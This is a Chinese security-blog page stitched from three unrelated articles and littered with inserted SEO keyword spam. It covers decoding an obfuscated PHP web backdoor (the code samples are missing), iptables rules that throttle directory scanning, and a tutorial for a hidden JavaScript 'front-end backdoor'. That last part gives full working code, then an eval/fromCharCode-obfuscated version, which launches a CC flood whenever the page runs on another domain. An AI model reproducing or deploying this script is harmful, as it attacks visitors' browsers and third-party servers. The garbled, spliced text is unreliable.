纯情博客为您提供最新网络安全黑客博客信息资讯

  写在前面的话

  测试网站安全性最困难的部分之一是确保我们可以找到网站上任何现有的后门。 大多数情况下，攻击者会在网站的各个地方注入恶意代码，以提高网站重新感染的成功率，并尽可能长时间地实现持续感染。

  虽然我们之前已经介绍了数百个后门及其相应的影响，但今天我们想与您更深入地讨论一些恶意软件分析技术chatgpt plus黑客技术，即如何解码复杂的高级恶意软件。

  本文分析的恶意软件感染样本已经存在了几个月，但感染该恶意软件变体（例如 CMS）的网站数量一直在增加。

  恶意软件

  成功感染目标网站后，攻击者可能会执行注入后门、Web shell、添加假管理员用户等恶意操作。 一般来说，攻击者会使用一种或多种技术来隐藏他们的恶意代码培训脚本，例如编码、加密、混淆等。

  请查看下面给出的代码片段。 其中，攻击者同时使用了上述三种技术。 接下来我们就一步步告诉大家如何解码和分析这段代码。

  原始恶意软件片段：

  简化代码

  在解码过程中，最重要的是了解代码的逻辑结构。 为此，我们使用 PHP 将前面的代码片段转换为下图所示的格式：

  虽然到目前为止代码仍然看不懂，但我们现在至少了解了代码的编程逻辑结构。

  攻击者在开头声明了一个名为“$”的变量，而这个变量没有实际意义。 根据我们的经验，攻击者可能会使用此变量的值 (406) 来识别恶意软件变体。

  另外，还有一些全局变量不会为我们理解代码提供任何帮助，我们可以直接忽略它们。

  该恶意软件样本基本上使用字符/字符串修改技术，攻击者将大量十六进制字符存储在变量中，然后将它们编译成不同的变量。

  第一个例子如下：

  这段代码可以通过下面的bash命令直接翻译：

`$ echo -e"\x47\x4c\x4fB\x41\x4c\x53"
GLOBALS
$ php -r 'echo"\x47\x4c\x4fB\x41\x4c\x53";'
GLOBALS`

  这个值（${}['tbb6a']）似乎使用了一些特殊字符来阻止它被翻译，但恶意软件最终似乎并没有使用这个值。 现在，我们可以创建一个简单的 PHP 脚本，自动打印出所有变量及其相应的值。

  查找和替换

  得到这些信息后，我们就可以使用查找和替换功能了。

  第一个变量如下：

  我们可以得到如下翻译结果：

  为了增加代码的可读性，我们将''替换为'arr'（因为它被声明为array()），然后我们继续翻译字符。

  几分钟后wordpress恶意代码，我们的代码如下所示：

  现在一切都更清楚了chatgpt，让我们对代码进行一些调整。 其中wordpress恶意代码，前几个变量可以直接替换为以下形式：

`$arr['l0e6'] = ‘chr’;
$arr['ac6c24d1'] = ‘ord’;
$arr['s8bb921e'] = ‘strlen’;`

  将代码中的各个变量和值调整到对应的位置后，我们就得到了上面代码中的第一个函数：

  恶意目的

  替换掉所有函数和变量后wordpress恶意代码培训脚本，我们可以得到如下代码段：

  拿到完整且可读的恶意代码后，我们发现了几个有趣的地方：

  1、有一个函数叫l3f5()视频培训脚本，它负责通过按位异或计算来进行加密和解密操作。

  2、函数()使用了两层异或加密/解密计算。

  a) 在第一层计算中黑客纯情，关键是一个预定义的常数：($w158 = '-62fe-4bb9-a1de-';)。

  b) 第二层使用的密钥来自POST参数或HTTP。

  c) 该函数主要用于对加密的序列化数据进行解码。 其中，序列化数据由攻击者通过 或 POST 参数传递给恶意脚本。

  3. 解码后的数据可能包含：

  a) 可执行的 PHP 代码。

  b) 提供有关后门和 PHP 版本信息的命令。

  总结

  互联网上有许多不同类型的恶意软件，但并非所有恶意软件都直接通过脚本执行恶意命令。 例如，在这个示例中，它可以通过$_POST或$接收任意命令，并且Web服务器默认不会记录此行为。

  为了防止网站被恶意软件感染渗透测试，强烈建议管理员实施文件完整性监控和Web应用防火墙（WAF）等安全措施。 除此之外，我们还建议管理员定期检查网站的日志记录wordpress恶意代码，以尽早发现可疑行为。

  * 参考来源：FB编辑编译，转载请注明出处来自.COM

  纯情博客为您提供最新网络安全黑客信息资讯

  目录扫描技术介绍

  目录扫描是辅以字典对目标网页模式进行推测并发觉隐藏URL的科技，这是黑客对网页常见的功击手段之一。根据扫描结果，黑客首先可以从大体上知道网站的构架，为施行下一步攻击收集信息，还可以发觉网站的掩藏路径或文件等脆弱信息网络培训脚本插件，比如：

  1）网页的管控后台：网站后台是管控员管理网页的插口之一，通常不会在网页公开页面上留下链接，所以很难被搜索引擎的爬虫扫描发现。当通过目录扫描方法，只要字典足够好，还是有非常大的机会发觉隐藏的管控后台入口。

  2）未受保护的脆弱页面：指不被网页鉴权机制保护的页面，而这类页面可能会拥有一些执行敏感操作的功用。

  3）网页的误删文件：如果数据库、源代码备份等，备份是管控员日常管理工作之一，有时侯可能会由于疏漏而把备份遗留在网页目录下。通过这种文件，黑客可以获得网页的源代码或者储存在数据库中的脆弱信息。

  4）其它黑客留下的侧门：通过扫描黑客还可能看到其它人留下的侧门网站如何防止黑客攻击，通过这种车门黑客可以不费吹灰之力荣获网站服务器的权限。

  5）网页配置文件：如果数据库初始化sql脚本，网站后台配置等。

  如何提防目录扫描

  当网页被扫描时访问量会忽然减少，同时形成大量的404访问日志，这是网页被扫描攻击的主要病症。接出来我给你们介绍如何借助使用防火墙策略识别流量中的404关键字，并对异常的扫描流量进行限制网站如何防止黑客攻击，这里我们使用到了的及组件：

`iptables -F
iptables -Z
iptables -X log404
iptables -N log404
iptables -A log404 -m limit --limit 1/min -j LOG --log-prefix "Dir_buster_attack " --log-level 3
iptables -A log404 -j DROP
iptables -A OUTPUT -p tcp -m tcp --sport 80 -m string --string "404 Not Found" --algo bm --to 65535 -m recent --update --seconds 10 --reap --hitcount 10 --rttl --name Block404 --mask 255.255.255.255 --rdest -j log404
iptables -A OUTPUT -p tcp -m tcp --sport 80 -m string --string "404 Not Found" --algo bm --to 65535 -m recent --set --name Block404 --mask 255.255.255.255 --rdest`

  在上边的事例中，我们使用组件识别HTTP响应中的“404NotFound”关键字渗透测试，并使用命令把服务器对每位IP的404响应速度限制在每10秒10次，当超出这个限制时，后续的应将被遗弃并触发TCP重传，直到过去10秒的响应数量多于10次。

  通过这些方法，可辨识短时间内出现的长期404响应，并借助丢包方式延长扫描软件的等候时间。

  通过使用扫描软件dirb（

  ）进行检测发现，当没有限制时，dirb在不到16秒的时间内总计扫描了13836个URL，平均800多次每秒：

  当使用时，100次恳求则花了50秒，平均每秒2次，而黑客一般每推进一次扫描要发送上万甚至上百万次恳求黑客博客，这个速率大大超乎了她们可接受的范围。可见在提防目录扫描攻击上能起到很高的隔离作用：

  需要留意的是：

  1）首先对流量非常大的网页，模块的参数应设定得足够长，建议更改为网页在高峰时平均在线IP的两倍左右，可借助修改/etc/.d目录下相应的配置文件：

  2）使用CDN部署的网页不建议使用这些方法，否则很可能造成CDNIP被刺死。

  3）--及--参数应按照实际环境进行微调，尽量在不妨碍正常访问的同时提升网页的隔离水准。

这个只能算个思路~~~
我相信大家也知道，所有前端页面的源码都是开源的，自己辛辛苦苦写的脚本，被人一个复制，作品就完了，经过10多天的苦思冥想，我自己想出了一个脚本，那就是在自己的前端页面留下后门，如果别人把你的源码复制走了，那么就对对方进行CC反击

思路是不是很猥琐，嘎嘎  整体思路就是，对自己做一个判断，判断如果不是自己的域名，就发起CC反击

本章节需要JS基础

这里我先打印输入自己的域名

url = window.location.href;
 
document.write("<br>url="+url)

可以看到， 域名是http://localhost/1.html 下面做一个判断，如果域名不是 http://localhost/1.html那么就发起cc攻击

if(url!='http://localhost/2tml'){   //判断域名如果不是http://localhost/2tml就执行下面的代码
 
url = window.location.href; //保存域名变量
 
  
 
function cctest() {
 
url = window.location.href;
 
var cc = new Image() //新创建一个图片
 
var rand = Math.floor(Math.random() * 2000) //图片get请求随机数
 
cc.src =url+'?'+rand+'.'
 
cc.onerror="cctest()"
 
cc.onload="cctest()"
 
cctest()
 
}
 
setInterval(cctest, 10)
 
setInterval(cctest, 10)
 
setInterval(cctest, 10)
 
}
 
//CC攻击

这里我的域名是http://localhost/1.html，不符合判断的要求，那么他就会发起CC攻击，假设我们是偷走源码的人，现在我们打开这个网页试试看

刚刚卡死了

可以看到，谷歌占用进程百分之60.还在不断的上涨，

好了，前端后门就完成了，但是，直接这样放上去肯定是不行的，因为大部分复制你源码的人，都懂点JS，所以我们要 “加工”

随便用个编码机制吧~~

//获取页面完整地址
 
url = window.location.href;
 
document.write("<br>url="+url)
 
  
 
if(url!='http://localhost/2tml'){        //判断，如果当前域名不是 localhost/2htm就发起CC攻击，这里你可以修改为自己的域名
 
  
 
//一下开始攻击
 
eval(
 
eval(String.fromCharCode(9,117,114,108,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,13,102,117,110,99,116,105,111,110,32,99,99,116,101,115,116,40,41,32,123,13,117,114,108,32,61,32,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,46,104,114,101,102,59,13,118,97,114,32,99,99,32,61,32,110,101,119,32,73,109,97,103,101,40,41,13,118,97,114,32,114,97,110,100,32,61,32,77,97,116,104,46,102,108,111,111,114,40,77,97,116,104,46,114,97,110,100,111,109,40,41,32,42,32,50,48,48,48,41,13,99,99,46,115,114,99,32,61,117,114,108,43,39,63,39,43,114,97,110,100,43,39,46,39,13,99,99,46,111,110,101,114,114,111,114,61,34,99,99,116,101,115,116,40,41,34,13,99,99,46,111,110,108,111,97,100,61,34,99,99,116,101,115,116,40,41,34,13,99,99,116,101,115,116,40,41,13,125,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41,13,115,101,116,73,110,116,101,114,118,97,108,40,99,99,116,101,115,116,44,32,49,48,41)))
 
}